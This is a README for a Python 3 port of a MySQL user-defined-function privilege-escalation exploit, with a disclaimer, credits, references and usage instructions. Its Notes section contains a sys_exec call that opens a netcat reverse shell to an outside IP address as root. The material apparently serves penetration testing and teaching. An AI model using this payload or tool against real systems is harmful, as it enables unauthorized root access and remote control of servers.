udf_root_py3

Advisory All the binaries/scripts/code of udf_root_py3 should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

I cannot accept the credit for this really useful script. I have simply made a few changes to a script I found so that it is Python3 compatible.

Original: https://github.com/d7x/udf_root

Thank you d7x for this awesome script.

MySQL User-Defined function Dynamic Library Local Privilege Escalation

*** MySQL User-Defined (Linux) x32 / x86_64 sys_exec function local privilege escalation exploit ***

UDF lib shellcodes retrieved from metasploit (there are windows .dll libraries within metasploit as well so this could be easily ported to Windows)

Based on the famous raptor_udf.c by Marco Ivaldi (EDB ID: 1518) CVE: N/A

References:

https://dev.mysql.com/doc/refman/5.5/en/create-function-udf.html

https://www.exploit-db.com/exploits/1518

https://www.exploit-db.com/papers/44139/ - MySQL UDF Exploitation by Osanda Malith Jayathissa (@OsandaMalith)

Notes

One thing I noticed when I used this script - the root shell that it attempts to give you after completing was NOT a root shell. However if you exit out of the shell it puts you into and just execute code like:

select sys_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 80 >/tmp/f');

Then this will execute as root.

To run the tool - use like:

python3 udf_root_py3.py --username root --password rootPassword